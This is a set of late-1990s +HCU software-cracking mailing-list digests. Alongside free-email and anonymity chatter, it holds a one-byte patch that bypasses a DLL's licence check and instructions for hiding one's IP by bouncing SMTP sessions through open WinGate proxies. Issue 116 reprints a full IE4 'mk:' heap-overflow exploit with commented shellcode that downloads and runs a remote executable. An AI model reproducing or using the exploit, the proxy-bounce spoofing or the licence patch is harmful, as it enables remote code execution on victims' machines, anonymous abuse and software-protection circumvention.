========================================================
+HCU Maillist Issue: 111 01/08/1998
--------------------------------------------------------
Send Articles To:......................... *************
Info, Help, Unsubscription, etc:....... ****************
Web Repository.........................hcuml.home.ml.org
========================================================
CONTENTS:
#1 Subject: ATTN: Aesculapius, Hackmore, Stone, Zer0degree
#2 Subject: Correction
ARTICLES:
-----#1-------------------------------------------------
Subject: ATTN: Aesculapius, Hackmore, Stone, Zer0degree
You should have received an email from me for your address. I'm sending
this message here in case the email got lost. If you haven't sent me your
address yet, please do so soon. Thanks.
~~
Ghiribizzo
-----#2-------------------------------------------------
Subject: Correction
-----BEGIN PGP SIGNED MESSAGE-----
In the article I wrote concerning the Tutorial
format and databases, some extra HTML tags
seem to have appeared. The and
tags were not in my original email
and extra '<'s have been added to the tags I
originally had in my email.
Is this a bug from the script to handle the
email or have they been added deliberately?
~~
Ghiribizzo
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv
iQEVAwUBNLM2Yv2BzbC3j9ThAQFyFwf+LIEwsGteDx6clAn9zkFiRa0+22+oCJbS
FYWWy2HeMRKQj3MxaTeVwGtwn30ez5LQmdbdmFszjcTHZIJBRu+QTmlBvQEoaw8M
hOA5Y+utC/kqWXsu++mkqH78RFzm9sCTWnAi45hSSm+3SXDJTjFFAt5Qk9seBp0S
fDDgf4uwAwU/DZGoyVxfL0/ca0rfbNvEFrzwC5GRqRDR4Hs+Ox/LWHlV3G/ay9bu
Bypd6FFcsbQICpt5Kds3LfcQcMERl5GSRn5filzCqfErwiSiXtBZU9rT6oAjorpp
71jBfnnyqYse+trDIKjyLetKo3/LhxxzormJpFRUd4ELizEG+FgCrg==
=sgle
-----END PGP SIGNATURE-----
=====End of Issue 111===================================
========================================================
+HCU Maillist Issue: 112 01/09/1998
--------------------------------------------------------
Send Articles To:......................... *************
Info, Help, Unsubscription, etc:....... ****************
Web Repository.........................hcuml.home.ml.org
========================================================
CONTENTS:
#1 Subject: script is working well
#2 Subject: none
#3 Subject: Hotmail caveats
ARTICLES:
-----#1-------------------------------------------------
Subject: script is working well
Hi Ghiribizzo!
The digester script is working well, the tags were in your mail
exactly as they appeared in the issue. Either you sent them or
the replay remailer inserted it (unlikely).
In 95% of the cases the letter body are pasted into the digest
byte by byte automatically, while I am sleeping :). Usually, only
if the letter is sent to a wrong address I have the opportunity to
check it before sending. Sometimes in those cases (like today the
letter of Thor) if the lines are too long, I reformat it by inserting
CR/LFs, but change nothing else.
Here, I would like to ask all of you to use short 50-60 character
lines, if possible. A great number of subscribers get the issues at
hotmail where the letter window is small and more convinient to read
shorter lines. (BTW, I am pleased that you do not send your letters
as HTML formatted text too, which seems to be a new sport on other
maillists since the new browsers came out :)
bye Zer0+
-----#2-------------------------------------------------
Subject: none
This one again went to the wrong address. Boys, try to send the
articles to the ************* address.
Zer0+
Hi to all, and happy new year,
I was reading the 109th +HCU mailing list and i notice that razzia+
wrote about the shrlk.dll, that reminds me a programm whith this dll
(Shrlk20.dll - is it the same?), A little searching in my notes and voila.
It was the webzip v. 1.30. In fact this was my first (and thank God
succesfull cracking session). From my notes i copy:
"It uses a DLL named Shrlk20.dll in the system32 dir which has all the
routines, for the protection. Its checkprotectionDll routine doesn't
respond to this type of crack. One byte changed from 7F07 E805 090000
IN THE SHRLK20.DLL to EB07…. From JG to JMP and its works OK"
And i do remember that it had some modules including checkprotectionDll.
When i cracked it i worried about this module but finally it was checking
...... the weather???
BTW i'm newbie nerd etc, but i'm trying I love you Guys...
Hi to: Fravia+, (Hi Fravia!), Aeculapius (YES!)
Keep on
Thor+
-----#3-------------------------------------------------
Subject: Hotmail caveats
Hello everyone
Hotmail and other mail providers have never been secure. I know
definitely
that bigfoot has given out details in the past. Though if you keep your
activities legal and low-key you should be OK.
encryption
do
the following:
=====End of Issue 112===================================
========================================================
+HCU Maillist Issue: 113 01/10/1998
--------------------------------------------------------
Send Articles To:......................... *************
Info, Help, Unsubscription, etc:....... ****************
Web Repository.........................hcuml.home.ml.org
========================================================
CONTENTS:
#1 Subject: ZipLock
#2 Subject: Re: script is working well
#3 Subject: Save disabled targets - MFC menu structures
ARTICLES:
-----#1-------------------------------------------------
Subject: ZipLock
Good evening to all.
Has anybody worked on the ZipLock program, or rather software which
has been wrapped up with ZipLock ?
I think it might provide an interesting project.
Best regards,
Zipper49.
****************************
______________________________________________________
Get Your Private, Free Email at **********************
-----#2-------------------------------------------------
Subject: Re: script is working well
-----BEGIN PGP SIGNED MESSAGE-----
-----#3-------------------------------------------------
Subject: Save disabled targets - MFC menu structures
Hi all,
I've recently been looking at a Win32 demo program with disabled functionality. At first sight anyway all the code appears to be there but some menu functions are hardcoded disabled.
The thing is written with MFC so all the menu handling is done through data structures with pointers to 'on_click' and update handlers for each menu item (or whatever they are called, I've never used MFC).
I stumbled around and managed enable 'Save As' which is all I really need but I wonder if anyone knows more about the menu data structures MFC uses? A fragment of a menu item list looks like this
dd 111h
dd 0
dd 32855 ; Paste menu item ID
dd 32855
dd 0Ch
dd offset PasteClick ; Paste Handler
dd 111h
dd 0FFFFFFFFh
dd 32855
dd 32855
dd 2Ch
dd offset PasteUpdate ; Paste menu item update Handler
Is this structure documented somewhere?
Spyder
********************
=====End of Issue 113===================================
========================================================
+HCU Maillist Issue: 114 01/12/1998
--------------------------------------------------------
Send Articles To:......................... *************
Info, Help, Unsubscription, etc:....... ****************
Web Repository.........................hcuml.home.ml.org
========================================================
CONTENTS:
#1 Subject: hmail
ARTICLES:
-----#1-------------------------------------------------
Subject: hmail
Hello Everyone
Well it seems Iam back to hotmail problems again, e.g. only half
of a Email message getting through,etc. Can anyone recommend any
organisations offering free Email?
The old and rest of the Email that did not make it.
>Hotmail and other mail providers have never been secure. I know
>definitely
>that bigfoot has given out details in the past. Though if you keep
>your activities legal and low-key you should be OK.
>encryption.
For someone who has not been surfing the Internet for very long.
Iam starting to feel that I have entered a warzone, with all the
security for Email, Webpages, Surfing the net, etc. Is it a
losing battle or myopia on the part of Big Brother and other
individuals who think they can gain total control? IMHO, the
heterogenous of society will not let this take place.
cheers Rundus
______________________________________________________
Get Your Private, Free Email at **********************
=====End of Issue 114===================================
========================================================
+HCU Maillist Issue: 115 01/13/1998
--------------------------------------------------------
Send Articles To:......................... *************
Info, Help, Unsubscription, etc:....... ****************
Web Repository.........................hcuml.home.ml.org
========================================================
CONTENTS:
#1 Subject: long rambling bs on freemail, etc...
#2 Subject: Iname
#3 Subject: free mailbox
#4 Subject: hmail
ARTICLES:
-----#1-------------------------------------------------
Subject: long rambling bs on freemail, etc...
Rundus:
First of all, here are a few resources for free email, etc..
***********************************************************
**************************************************
*************************************************************************************************
Now security is always going to be a problem...when sending, many of
these freemail providers include your IP address as part of the email
header. For anonymity, this is no good. Your best bet for security when
sending email--assuming you do not want the person you are sending to
to have any info about you--is using ************** or
****************** (these both have WWW-based anonymous emailers).
When receiving email, as long as you use a psuedonym on your email
account, everything will be fine. You can assume that everything going
in and out of your email account can be read by any one at any
time...there is no way to stop that (except by encrypting your emails,
which somewhat detracts from the convenience of the medium), but you can
stop that email account from being traced to your person or your PC.
Why all this healthy paranoia? Because it is so "simple", or so commonly
done...there is no real privacy. Except for the real privacy: being lost
in the crowd. You see, there is just too damn much traffic on the
internet for it all to be monitored for incriminating material.
To illustrate:I once worked at a 24/7 market which had upwards of twenty
cameras running full time and recording everything...they had to change
twenty VCR tapes every four hours! Good security? Not quite. The store
could not afford to pay anyone to watch 20x24hours worth of video tapes
a day...therefore the employees and customers were able to rob the place
blind! The tapes were _only_ good for nailing someone that they knew was
up to something...
Get the picture? If you are not suspect, you are "safe". The trick is
to be careful and not stupid...use fake names, do not send emails from
your personal machine (except through an anonymizer) if you think the
person on the other end is going to try to trace back to you (i.e., a VB
programmer wouldn't but a cracker might just for fun!)--guard your IP
address, it leads to your ISP! Other than that, unless you put big signs
up on your web page posting how you hacked the FBI's site, you are
probably alright.
_m
______________________________________________________
Get Your Private, Free Email at **********************
-----#2-------------------------------------------------
Subject: Iname
I have found ************* to be very reliable and fast. I have no idea
about its security. I suspect it is no better than other free email
services. Anyone know?
zinger
-----#3-------------------------------------------------
Subject: free mailbox
Rundus wrote:
>Well it seems Iam back to hotmail problems again, e.g. only half
>of a Email message getting through,etc. Can anyone recommend any
>organisations offering free Email.
I also noticed that hotmail was completely down a couple of times
lately (seems MS really started to take over it :)
In my experiance netaddress.usa.net works fine. It also has
the advantage that you can download your mail by any POP3 mailer.
Zer0+
-----#4-------------------------------------------------
Subject: hmail
-----BEGIN PGP SIGNED MESSAGE-----
Netforward offer a email forwarding service if that's what you want.
Otherwise you could try Geocities. They offer free web pages and also give
out free email addresses. Just signup and post a bogus boring web site and
you've got an email account. Oh, you need an email account to set it up -
last time I did this, Geocities accepted hotmail addresses.
As for the incomplete email, I got that too. It looks like an echo of part of
a message I posted in an earlier issue. I think something is wrong because
first of all the HTML tags were added to my post (the tags are NOT in the
copy of the email I sent in the outbox) and then a PGP signed message I sent
was not transmitted properly (only the first PGP line was shown) and now this
echo. Anyone got any idea what's going on?
~~
Ghiribizzo
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv
iQEVAwUBNNObf/2BzbC3j9ThAQErwAgAt6hsteSyHpy0F+67Wv4pecv6UdMhh+ki
WVE9k/kHlUJ5XfqW2I0ZzjDFuG+7OyRf13LH5S2Wv5XE3bZJVzjZ65nCNnvdPnRj
WYbEC5+m2jJo9q5w3x0+zs1+oblhdzYvPvH77UMAfoiBld5Zl6vSlL6Ja+XVL5yl
RfqdVadw2G1g0ngAQ9wX9IlOylamx7HnkFzHTndkwKeFiFmaueaNxkr2zMQ/5Xo2
WtAK4jxAqsMTrTA+QIeM8AdrHX6+Crzc94KIz/73LxhlJtcGOSuKNPiHiCp7AdNy
nGO59xPU/NEUX/9ojcuj0NJeTu4uU4YhiCWImLVoCHNTLfduFNmDuQ==
=wcoE
-----END PGP SIGNATURE-----
=====End of Issue 115===================================
========================================================
+HCU Maillist Issue: 116 01/15/1998
--------------------------------------------------------
Send Articles To:......................... *************
Info, Help, Unsubscription, etc:....... ****************
Web Repository.........................hcuml.home.ml.org
========================================================
CONTENTS:
#1 Subject: Thank You
#2 Subject: for java buff (by fravia+)
#3 Subject: Anonymous (?) email...
#4 Subject: +RCG's 'Heavy Protection'
#5 Subject: M$ Explorer Flaw
ARTICLES:
-----#1-------------------------------------------------
Subject: Thank You
Hello Everyone
I would like to thank everyone for their replies and help.
With regards to Email security, its an area in which I
must allocated more time and effort too. Iam sure Fravia
knows what I eat for breakfast :-).
cheers Rundus
______________________________________________________
Get Your Private, Free Email at **********************
-----#2-------------------------------------------------
Subject: for java buff (by fravia+)
A nice present for all our java buffs, I believe :-)
s/install/
'course you can go
-----#3-------------------------------------------------
Subject: Anonymous (?) email...
Since it seems to be of great importance to find a better/more anonymous
way to send and receive email, some tricks of the trade which can really
assist you in defending your privacy:
(this tricks are only for SENDING mail, since receiving is not that
much a problem)
Get a shell account or something similar; at least a telnet client
is necessary. You can send email by telnetting to a mailserver to
port 25 (telnet victim.com 25) and then using the SMTP commands.
"HELO **************** /* introduces you to the server */
"mail from: ******************* /* this will appear in the header */
"rcpt to: ****************** /* obvious */
"data"
Now enter your email, end of email is signalled by a single
"."(enter)
O.K, now we get a small problem: 99% of all mailservers log your
IP and stamp it on top of the mail, which is something we strongly
want to avoid. Now, to disguise this IP, we use either the WinGate-
bouncing or FTP-bouncing attack. I won't go into details about FTP-
bouncing, Hobbit wrote a good paper about that.
Wingate is another trick how Windoze can be good for you: It is a prog
which allows a whole network to use one connection, nice for schools
etc.
Now, the bug is: If you telnet to a Wingate on port 23, you'll most
likely get a prompt like this "Wingate> ". If you have found one, you've
struck gold, since you can now enter the hostname & port you
want to telnet to, and Wingate will connect you :-), effectively
disguising your IP. This is said to be fixed in the newest version,
but there are still plenty of old Wingates out.
Note: Attention, you're NOT 100%ly untraceable, since some Wingates log
such activity. (most do not, though).
How to find Wingates ? This is a bit of work. Write yourself a small
C-program, or download a portscanner from the internet. If you write
your own, all it has to do is to try to open a connection on port 23 to
a whole bunch of IP-Adresses you specify, and then logging all who
respond into a file (with their response). Lateron, you just search
through that file for the Wingate prompt.
Multiple bounces are possible, thus lowering the chance of being logged.
Another thing I haven't tried yet (since I don't know yet how to write
raw packets) is to fake the reply-address in the packetheader; this
might work since sending mail doesn't require you to receive data.
(You'd better fake it to an IP whose server is down, though, :-)
Anybody here who is interested in that kind of stuff ? Learning in
groups is always more fun than alone :-)
Halvar from Flake :-)
______________________________________________________
Get Your Private, Free Email at **********************
-----#4-------------------------------------------------
Subject: +RCG's 'Heavy Protection'
Well, I downloaded some of the essays regarding +RCG's self32
protection and then decided to download his 'heavy' protection. In the
few intervening minutes I saw that Fravia had updated his page and that
Quine had already cracked it! You really have to be quick off the
mark to be the first these days :)
I quote part of the letter by Quine which can be found on the protecti
page.
>>>>
with the hasp encryption. The solution, by the way, is to create a
10h byte long file called key.dat which contains 00h through 0Fh. The
key, as +RCG tells us is too easy, but even with a completely random
key of 10h bytes it would have taken about 2 minutes to find it. I'm
not going to explain how I figured out that it was a 10h byte string
xor'd with the code from 4012B9h to 401300h because it's fairly easy
to figure that out. Here's how to find the key. Isolate the
encrypted bytes in their own file, load that file in HexWorkshop, and
print it out. You Should have something that looks like this:
<<<<
The length of the file is basically given to us in the exe. This could
be improved slightly by reading say 100h bytes and then XORing until a
terminator (00h) was found and then encrypted again. This would conceal
the filelength using the source sniff method.
It would still, however, be susceptible to a more 'cryptographic' approach.
This method (counting coincidences) is simple and is outlined in Bruce
Schneier's book 'Applied Cryptography' (a must buy for all crackers).
Oh, this quote should be learned by all protectionists:
"There's no real security here. This kind of encryption is trivial to
break even without computers." [regarding XOR encryption]
He then goes on to list the method of breaking XOR encryption.
The key flaw in the protection was using a short key. The key used
MUST be the SAME length as the code to be encrypted (i.e. an OTP)
The real difficulty is programming a random number generator for the OTP
as the entire security of the system lies in the RNG. I noticed chaos
being mentioned in one of RCG's later essays and I toyed with the idea of
using a one dimensional chaotic system (Sierepinski Carpet (sp?)) as a RNG
but it was too much of a headache making sure the numbers were truely
random. Your best bet is to look out for some ready made RNGs make sure that
they designed for cryptography and not just some homegrown RNG.
To my knowledge, no one has yet made a truely random RNG.
~~
Ghiribizzo
BTW, never reuse an OTP, this destroys it's security.
-----#5-------------------------------------------------
Subject: M$ Explorer Flaw
Yes, I DO know that this is NOT a hacking-related mailinglist, but
I got a few thoughts to share as well as an interesting article from
Bugtraq....
First of all: In hacking, the most important things needed was C
programming and UNIX knowledge, since most servers used to run on
UNIX or derivatives.
But now, that M$ NT takes over more and more sites, the importance
of C slowly fades, often replaced with ASM. The methods change
radically.
The so-called "Buffer overflow exploits" are IMHO more related to
"cracking" in the widest sense than to anything else. I won't go into
detail about them, anyone interested should read Aleph1s Article in
Phrack... (was it 49?)
Anyways, the following text demonstrates how knowledge of assembly and
some good ideas can be used to strike major blows at the M$ Juggernaut.
Nothing strikes the trust of people harder than vulnerabilities like
this; and this is an encouragement for all those
Windows-Assembly Gurus out there (I am unfortunately more into learning
C right now and it's hard for me to use Win95 once you've
come to install Linux :-) or even the HCU to start a project concerning
M$ security flaws.
Anyways, the following article comes directly from BugTraq, and can
be viewed at l0pht.com.
========
Scenario
========
TAKE TWO!
The Microsoft Internet Explorer 4.0(1) Suite, including all programs
supplied
with it that read and/or process HTML from either local machines,
intranet
machines, or remote internet machines are subject to a buffer overflow
in the
HTML decoding process. The buffer overflow can cause the application
to page
fault, or in the worst case, execute arbitrary precompiled native
code.
Unlike the res:// bug, found a few months ago, this bug _does_ affect
Windows NT as well as Windows 95.
It has also been reported that this bug affects Internet Explorer 3.0
if
you have Visual Studio (VC++/J++ etc) installed on your system. Though
this
may be true, and if so, exploitable, there has not been exploit code
written
up for it.
Currently, sample exploit code has been written for:
Windows 95 OSR1 and OSR2 running IE4.0 or IE4.01
Systems known vulnerable:
Windows 95 OSR1, OSR2 running IE3.0x+Infoviewer, IE4.0, IE4.01
Windows NT Workstation/Server running IE4.0,IE4.01
=======
Example
=======
Much like the res:// overflow, this bug can be seen in action by
clicking on
a link -or- having the browser auto-refresh to a URL with the
executable
code in the url. Please look at the L0pht Advisory homepage for this
bug for
a detailed example of the problem.
=================
Technical Details
=================
The problem here lies in the deciphering of the URL line format
itself. The
base HTML library that is used by the Internet Explorer 4.0 Suite and
the
following programs are vulnerable:
- Outlook Express (both mail and news)
- Windows Explorer
- Internet Explorer (different than regular explorer, really)
This problem, because it stems from a programming flaw in the HTML
decoding
system, is unaffected by the Explorer "Security Zones" feature. In
other
words, if you turn on the highest security level for the zone from
where the
exploit HTML is being viewed, you are still vulnerable.
The critical problem here is a buffer overflow in the parsing of a
particular
new type of URL protocol. The "mk:" type of URL is meant to access
proprietary Microsoft 'InfoViewer Topics', as exhibited by the
InfoViewer of
Visual Studio, and the Help System of IE4.0(1).
For example, the URL for the Microsoft IE4.0 help system is:
*****************************************************************
The buffer overflow is not a standard stack overflow, but rather a
_heap_
overflow. This complicated coding exploits, but is, nonetheless,
do-able.
========
Solution
========
Currently, there is no solution available for this flaw. You can't set
any
Internet Explorer options to avoid it, and you are not protected by
any
level of zone security. Simply don't surf the web, read email or view
net news using Internet Explorer 4.0(1) until Microsoft puts up a
hotfix.
============
Exploit Code
============
Ok. This time, I'm going to assume you know something about stack
overflows
and writing generic buffer overflow scripts. If you're lost already,
then the
rest of this sure as hell ain't going to make any sense to you.
The exploit code overflows a buffer on the heap, overwriting a few
critical
heap variables and, eventually leaving the EIP at a ridiculous point
in the
middle of URLMON.DLL ready to crash, unless you, bold coder, know what
to
stuff in those registers.
Turns out that when you overflow that heap buffer, you can stuff a
value
right into EAX. This is important, because the critical code section
that you
reach looks like this:
(URLMON!.text+)
014F:702A365E 8B08 MOV ECX,[EAX]
014F:702A3660 50 PUSH EAX
014F:702A3661 FF5108 CALL [ECX+08]
(Incidentally, all the addresses here are for DLL's provided with
IE4.01
not IE4.0. The code is similar for IE4.0. Just different offsets.
Onward.)
You need that CALL [ECX+08] to jump to something useful. The place
where
it jumps is to a location in URLMON.DLL (or was it MSHTML.DLL, I
forget.)
that has an instruction that looks like CALL ECX. To get the NULL
bytes and
things in the right places involves a little finagling of the string
using
%00, and the null-terminator of the URL. It's really fun. Trust me.
After that CALL ECX happens, your EIP points to a piece of code that
is
in your exploit space. Then, just jump to the beginning of the exploit
code
and start having fun. I used CALL to save a byte. (Who cares about the
stack
now anyway? You've already blown it to hell.)
Ok. Here's it. (Described in terms of IE4.01)
Commented disassembly: (starting at ****************
> Skip over the jump tables
0057CC7C: 3BC0 cmp eax,eax
0057CC7E: 7468 je 00057CCE8
> blah blah blah
0057CC80: 90 nop
0057CC81: 90 nop
0057CC82: 90 nop
> Jump tables start here for WININET.DLL functions
> WinInet Function addresses:
>
> (dated 9/18/97) IE4.0 (dated 11/18/97) IE4.01
> InternetOpenA 0x702120B9 0x70211817
> InternetOpenUrlA 0x7021949F 0x70219345
> InternetCloseHandle 0x7020422B 0x7020422E
> InternetReadFile 0x7020E2DC 0x7020E3C4
0057CC83: BFE9E7DE8F mov edi,08FDEE7E9
(InternetOpenA)
0057CC88: F7DF neg edi
0057CC8A: FFE7 jmp edi
0057CC8C: BFBB6CDE8F mov edi,08FDE6CBB
(InternetOpenUrlA)
0057CC91: F7DF neg edi
0057CC93: FFE7 jmp edi
0057CC95: BFD2BDDF8F mov edi,08FDFBDD2
(InternetCloseHandle)
0057CC9A: F7DF neg edi
0057CC9C: FFE7 jmp edi
0057CC9E: BF88C741E0 mov edi,0E041C788
(InternetReadFile)
0057CCA3: D1EF shr edi,1
0057CCA5: FFE7 jmp edi
> End WININET Jump Table
0057CCA7: 90 nop
> Start Kernel Offset Table for Win95 OSR 2 (no bad
characters/nulls/otherwise!)
> Win95B Function addresses:
>
> WinExec (0xBFF9D330)
> _lopen (0xBFF773FB)
> _lclose (0xBFF98283)
> _lwrite (0xBFF9CDE8)
> _lcreat (0xBFF9CDBE)
> ExitProcess (0xBFF8AECD)
> GlobalAlloc (0xBFF74904)
0057CCA8: 30 D3 F9 BF-FB 73 F7 BF-83 82 F9 BF-E8 CD F9 BF
0057CCB8: BE CD F9 BF-CD AE F8 BF-04 49 F7 BF-
> Start Kernel Offset Table for Win95 OSR 1 (no bad ones here either!)
> Win95A Function addresses:
>
> WinExec (0xBFF9D330)
> _lopen (0xBFF773FB)
> _lclose (0xBFF98283)
> _lwrite (0xBFF9CDE8)
> _lcreat (0xBFF9CDBE)
> ExitProcess (0xBFF8AECD)
> GlobalAlloc (0xBFF74904)
0057CCC4: F8 CF F9 BF-B7 72 F7 BF-CF 80 F9 BF-B0 CA F9 BF
0057CCD4: 86 CA F9 BF-B0 AF F8 BF-04 49 F7 BF-
> blah blah blah
0057CCE4: 90 nop
0057CCE5: 90 nop
0057CCE6: 90 nop
0057CCE7: 90 nop
0057CCE8: 90 nop
> check windows kernel version by querying random byte that happens to
> be different in the two versions. Also, set up ESI to be a pointer to
> the kernel offset table for the correct version.
0057CCE9: BB8BFFF7BF mov ebx,0BFF7FF8B
0057CCEE: 2AFF sub bh,bh
0057CCF0: 8BF5 mov esi,ebp
0057CCF2: B032 mov al,032
0057CCF4: 3803 cmp [ebx],al
0057CCF6: 750E jne 00057CD06
0057CCF8: 33C0 xor eax,eax
0057CCFA: B05F mov al,05F
0057CCFC: 90 nop
0057CCFD: 03F0 add esi,eax
0057CCFF: 720E jb 00057CD0F
0057CD01: 90 nop
0057CD02: 90 nop
0057CD03: 90 nop
0057CD04: 90 nop
0057CD05: 90 nop
0057CD06: 33C0 xor eax,eax
0057CD08: B07B mov al,07B
0057CD0A: 90 nop
0057CD0B: 03F0 add esi,eax
0057CD0D: 90 nop
0057CD0E: 90 nop
0057CD0F: 90 nop
> ESI is now a pointer to the first function the the appropriate kernel
> offset table. Now, we need to decode our 'data segment'. Do so, by
XOR'ing
> (ADD'ing) each byte of the data area with 0x80. This prevents people
from
> seeing what we're doing, as well as keeping out null characters and
bad
> stuff in the exploit string.
0057CD10: 33C9 xor ecx,ecx
0057CD12: 66B95D01 mov cx,0015D
0057CD16: 03CD add ecx,ebp
0057CD18: B238 mov dl,038 ;"8"
0057CD1A: 800180 add b,[ecx],080 ;"«
0057CD1D: 41 inc ecx
0057CD1E: 4A dec edx
0057CD1F: 75F9 jne 00057CD1A ----
0057CD21: 90 nop
0057CD22: 90 nop
> It becomes clear where we're going :)
> Let's allocate some memory. 65535 bytes to be precise.
0057CD23: 66BAFFFF mov dx,0FFFF ;"__"
0057CD27: 52 push edx
0057CD28: 33D2 xor edx,edx
0057CD2A: 52 push edx
0057CD2B: FF5618 call d,[esi][00018]
0057CD2E: 8BD8 mov ebx,eax
> Ok. Now we go ahead and call InternetOpenA and keep that Internet
handle
> in EAX. Why do I call this function twice? I don't know. I was
debugging
> and I never took it out. NOP it if you want. I don't care.
0057CD30: 33D2 xor edx,edx
0057CD32: 52 push edx
0057CD33: 52 push edx
0057CD34: 52 push edx
0057CD35: 52 push edx
0057CD36: 90 nop
0057CD37: 6681C25D01 add dx,0015D
0057CD3C: 03D5 add edx,ebp
0057CD3E: 52 push edx
0057CD3F: E83FFFFFFF call 00057CC83
0057CD44: E83AFFFFFF call 00057CC83
> Now we call InternetOpenUrlA, getting us ready to download a file from
> the net into that buffer we allocated
0057CD49: 33D2 xor edx,edx
0057CD4B: 52 push edx
0057CD4C: 52 push edx
0057CD4D: 6AFF push 0FF
0057CD4F: 52 push edx
0057CD50: 6681C26501 add dx,00165
0057CD55: 03D5 add edx,ebp
0057CD57: 52 push edx
0057CD58: 50 push eax
0057CD59: E82EFFFFFF call 00057CC8C
> We then go ahead and call InternetReadFile, downloading 65535 bytes
from the
> net and into the buffer.
0057CD5E: 8BD5 mov edx,ebp
0057CD60: 83C230 add edx,030
0057CD63: 90 nop
0057CD64: 90 nop
0057CD65: 52 push edx
0057CD66: 2BC9 sub ecx,ecx
0057CD68: 6649 dec cx
0057CD6A: 51 push ecx
0057CD6B: 53 push ebx
0057CD6C: 50 push eax
0057CD6D: E82CFFFFFF call 00057CC9E
> Call _lcreat, and make us a place to store what we downloaded.
0057CD72: 33D2 xor edx,edx
0057CD74: 52 push edx
0057CD75: 6681C25D01 add dx,0015D
0057CD7A: 03D5 add edx,ebp
0057CD7C: 52 push edx
0057CD7D: FF5610 call d,[esi][00010]
> ok, call _lwrite and write the buffer to the file.
0057CD80: 8BD5 mov edx,ebp
0057CD82: 83C230 add edx,030 ;"0"
0057CD85: 8B12 mov edx,[edx]
0057CD87: 52 push edx
0057CD88: 53 push ebx
0057CD89: 50 push eax
0057CD8A: 8BD8 mov ebx,eax
0057CD8C: FF560C call d,[esi][0000C]
> Close the file with _lclose.
0057CD8F: 53 push ebx
0057CD90: FF5608 call d,[esi][00008]
> Now run what we downloaded by calling WinExec!
0057CD93: 33D2 xor edx,edx
0057CD95: 42 inc edx
0057CD96: 52 push edx
0057CD97: 6681C25C01 add dx,0015C
0057CD9C: 03D5 add edx,ebp
0057CD9E: 52 push edx
0057CD9F: FF16 call d,[esi]
> And go ahead and kill the Internet Explorer process. It's pretty
> bung'd out by now, and if we don't kill it, it will kill itself :)
0057CDA1: FF5614 call d,[esi][00014]
> The rest of this is left as an exercise to the reader, and is really
only
> worth about 5 minutes of staring at. (Though it took about 5 or so
hours to
> come up with!) Basically, you just gotta play around with your
debugger
> and work those registers. Be clever, and you'll get something like
this:
0057CD98: - - -2D 2D E6 EF
0057CDA8: EF AE E5 F8-E5 80 E8 F4-F4 F0 BA AF-AF F7 F7 F7
0057CDB8: AE EC B0 F0-E8 F4 AE E3-EF ED AF FE-E4 E9 EC E4
0057CDC8: EF E7 AF E9-E5 B4 DF ED-EB AF E6 EF-EF AE E5 F8
0057CDD8: E5 80 AD AD-AD AD AD AD-F3 9A 57 25-30 30 2D 2D
0057CDE8: 2D 2D 2D 2D-2D 2D 2D 2D-2D 2D 2D 2D-2D 2D 2D 2D
0057CDF8: 2D 2D 2D 2D-2D 2D 2D 2D-2D 2D 2D 2D-2D 24 25 26
0057CE08: 27 28 29 2A-2B 2C 2D 2E-2F 30 31 32-33 34 35 36
0057CE18: 37 38 39 3A-3B 3C 3D 3E-3F 40 80 81-82 83 84 85
0057CE28: 86 87 88 E9-E8 4B FE FF-FF C0 74 F7-8A 2F 27 70
0057CE38: DB CD 57 22-3E 0D 0A 57-68 65 6E 20-79 6F 75 27
0057CE48: 72 65 20 72-65 61 64 79-2C 20 63 6C-69 63 6B 20
0057CE58: 68 65 72 65-2E 0D 0A 3C-2F 61 3E 0D-0A 3C 2F 63
0057CE68: 65 6E 74 65-72 3E 0D 0A-3C 2F 62 6F-64 79 3E 0D
0057CE78: 0A 3C 2F 68-74 6D 6C 3E-0D 0A 0D 0A-0D 0A 0D 0A
0057CE88: 0D 0A - - -
> Phew!
Anyway. The short and long of all that disassembly is this:
1. It downloads a <64K file from the internet (any URL)
Using the current firewall and proxy settings...
2. It saves it as "foo.exe" on your desktop (probably)
3. It runs the executable.
4. To see which URL it is downloading, just XOR the tail end of
the
exploit string with 0x80's.
Hope you caught all that.
------------------------------
A haiku:
Strike two for I.E.
Common buffer overflows
Is that all of them?
**************** (01/13/97)
---
Liked it ? :-)
Halvar
______________________________________________________
Get Your Private, Free Email at **********************
=====End of Issue 116===================================
========================================================
+HCU Maillist Issue: 117 01/16/1998
--------------------------------------------------------
Send Articles To:......................... *************
Info, Help, Unsubscription, etc:....... ****************
Web Repository.........................hcuml.home.ml.org
========================================================
CONTENTS:
#1 Subject: Re: freemail
#2 Subject: could be an interesting protection, anyone checking?
#3 Subject: help on disassembling file
#4 Subject: smtp question - maybe i missed something (+gthorne)
#5 Subject: Re: Stuck with Everlock
#6 Subject: Anonymous Remailers
ARTICLES:
-----#1-------------------------------------------------
Subject: Re: freemail
>>>
When receiving email, as long as you use a psuedonym on your email
account, everything will be fine. You can assume that everything going
in and out of your email account can be read by any one at any
time...there is no way to stop that (except by encrypting your emails,
which somewhat detracts from the convenience of the medium), but you can
stop that email account from being traced to your person or your PC.
<<<
Using a nymserver will shorten the exposure to just between the sender and
nymserver. Of course the sender could encrypt.
Encryption is handled quite painlessly by using Eudora Pro which has PGP
extensions built into it. (using PGP 5). Worth checking out...
~~
Ghiribizzo
-----#2-------------------------------------------------
Subject: could be an interesting protection, anyone checking?
forwarded
-------------Forwarded Message-----------------
From: Tony & CAthy, **********************
To: , **********************
Date: 15-01-98 5:36
RE: request for tutorail: Firehand Ember 3.1.1
Sender: *************
Received: from galaxy.chez.com ([194.98.133.161] (may be forged))
by dub-img-3.compuserve.com (8.8.6/8.8.6/2.10) with ESMTP id XAA05970
for **************************** Wed, 14 Jan 1998 23:35:53 -0500 (EST)
Received: from dwx1.dwx.com (dns1.dwx.com [207.206.192.1])
by galaxy.chez.com (8.8.5/8.8.5) with ESMTP id FAA25340
for **************** Thu, 15 Jan 1998 05:35:08 +0100 (CET)
Received: from tony1.dwx.com (as-dwx-7-15.dwx.net [207.206.193.177])
by dwx1.dwx.com (8.8.5/8.8.5) with SMTP id WAA28929
for **************** Wed, 14 Jan 1998 22:34:08 -0600 (CST)
Message-ID: ***********************
Date: Wed, 14 Jan 1998 22:36:35 -0800
From: Tony & CAthy ***************
X-Mailer: Mozilla 2.0 (Win95; U)
MIME-Version: 1.0
To: *************
Subject: request for tutorail: Firehand Ember 3.1.1
X-URL: ************************************
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
I would like to see a tutorial on cracking Firehand Ember 3.1.1
from ***************** It can detect that it's code has been
altered and then it locks you out and warns you not to try it
again or it will delete your hard drive etc.... I think it
